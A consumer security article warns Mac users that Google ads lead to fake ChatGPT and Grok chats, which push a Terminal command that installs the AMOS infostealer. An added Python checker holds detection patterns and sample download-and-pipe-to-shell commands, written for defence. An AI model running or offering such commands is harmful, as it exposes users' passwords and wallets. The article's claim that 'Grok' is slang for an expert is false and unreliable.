Have you ever clicked on a Google ad believing it to be credible and useful? Most of us have at some point. Hackers are currently relying on this habit to target Mac users, using bogus ChatGPT and Grok articles to distribute malicious software.
How Do These Scams Function?
The scam uses a very smart approach. Hackers pay for Google Ads that appear when people search for answers to common Mac problems, like "How to delete system data from my Mac." The ad directs the user to a fake ChatGPT or Grok (Grok is the slang term used on the internet today for a person who is well versed in a certain area of expertise) chat service which looks completely legitimate and appears to offer assistance and guidance.
These fake chats give the user instructions to copy and paste a command into their Mac's Terminal window. Unfortunately, the command installs a Trojan that allows hackers to access your device without you knowing it. Once you enter this command, your nightmare has just begun!
Then what happens? The command:
- Requests a Mac password
- Uses your password to have total access to your entire system
- Downloads and installs the AMOS infostealer malware
- Steals all private information stored on your computer
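Added example (not from the original article): a small Python check that inspects a command before it is pasted into Terminal and reports which of the behaviours listed above it shows. The patterns, function names and sample commands are assumptions constructed for illustration.

```python
import re

# Heuristic patterns for the behaviours the article lists (download, install,
# password request). They are assumptions made for this example.
RULES = {
    "downloads remote content": re.compile(r"\b(curl|wget)\b[^|;&]*https?://", re.I),
    "pipes data into a shell": re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
    "runs a command substitution in a shell": re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\("),
    "decodes base64 text": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "asks for or uses your password": re.compile(r"\bsudo\b|\bosascript\b.*password", re.I),
    "removes Gatekeeper quarantine": re.compile(r"\bxattr\b.*com\.apple\.quarantine"),
}
EXECUTES = {"pipes data into a shell", "runs a command substitution in a shell"}
HIDES_OR_FETCHES = {"downloads remote content", "decodes base64 text"}


def triage_command(command):
    """Return the names of every rule that matches a pasted Terminal command."""
    text = " ".join(command.split())  # collapse line breaks and repeated spaces
    return [name for name, pattern in RULES.items() if pattern.search(text)]


def verdict(command):
    """Summarise the findings as one of three outcomes."""
    found = set(triage_command(command))
    if found & EXECUTES and found & HIDES_OR_FETCHES:
        return "do not run"  # fetched or hidden text is handed straight to a shell
    if found:
        return "review before running"
    return "no known risky pattern"


# Constructed sample commands; example.invalid is a reserved, non-resolving name.
SAMPLES = [
    "curl -fsSL https://example.invalid/cleanup.sh | bash",
    'echo "<constructed-placeholder>" | base64 -D | sudo sh',
    "sudo purge",
    "du -sh ~/Library/Caches",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(f"{verdict(cmd):<24} {cmd}")
        for finding in triage_command(cmd):
            print(f"    - {finding}")
```

A result of "no known risky pattern" only means none of these few patterns matched; it does not show that a command is safe to run.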
What Does This Malware Steal?
This malware aims to steal important information. Examples include:
- Browsing history and saved passwords
- Cookies and login sessions
- Wallet keys and cryptocurrency wallets
- Personal documents, computer specifications, etc.